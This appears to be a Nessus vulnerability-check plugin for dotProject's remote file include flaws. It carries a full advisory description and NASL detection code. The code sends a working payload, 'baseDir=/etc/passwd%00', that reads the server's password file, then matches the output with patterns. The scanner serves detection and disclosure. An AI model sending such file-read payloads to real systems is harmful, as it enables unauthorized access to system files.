#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server contains a PHP application that is affected by
multiple remote file include vulnerabilities. 

Description :

The remote host is running dotProject, a web-based, open-source,
project management application written in PHP. 

The installed version of dotProject fails to sanitize user input to
various parameters and scripts before using it in calls to PHP
functions such as 'include', and 'require_once()'.  Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker may
be able to leverage these issues to view arbitrary files or to execute
arbitrary PHP code on the remote host, subject to the privileges of
the web server user id. 

See also :

http://www.securityfocus.com/archive/1/424957/30/0/threaded
http://www.dotproject.net/vbulletin/showthread.php?t=4462

Solution :

Disable PHP's 'register_globals' setting as per the application's
installation instructions. 

Risk factor : 

Medium / CVSS Base Score : 6 
(AV:R/AC:H/Au:NR/C:P/A:P/I:P/B:N)";


if (description) {
  script_id(20925);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2006-0754", "CVE-2006-0755");
  script_bugtraq_id(16648);

  script_name(english:"dotProject Remote File Include Vulnerabilities");
  script_summary(english:"Checks for remote file include vulnerabilities in dotProject");
 
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/dotproject", "/dotProject", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Try to exploit one of the flaws to read /etc/passwd.
  file = "/etc/passwd";
  req = http_get(
    item:string(
      dir, "/includes/db_adodb.php?",
      "baseDir=", file, "%00"
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(string:res, pattern:"root:.*:0:[01]:") ||
    # we get an error saying "failed to open stream" or "failed opening".
    #
    # nb: this suggests magic_quotes_gpc was enabled but passing
    #     remote URLs might still work.
    egrep(string:res, pattern:"main\(/etc/passwd\\0/lib/adodb/adodb\.inc\.php.+ failed to open stream") ||
    egrep(string:res, pattern:"Failed opening required '/etc/passwd\\0/lib/adodb/adodb\.inc\.php' ")
  ) {
    if (egrep(string:res, pattern:"root:.*:0:[01]:")) 
      contents = res - strstr(res, "<br");

    if (isnull(contents)) report = desc;
    else {
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "Here are the contents of the file '", file, "' that\n",
        "Nessus was able to read from the remote host :\n",
        "\n",
        contents
      );
    }

    security_warning(port:port, data:report);
    exit(0);
  }
}
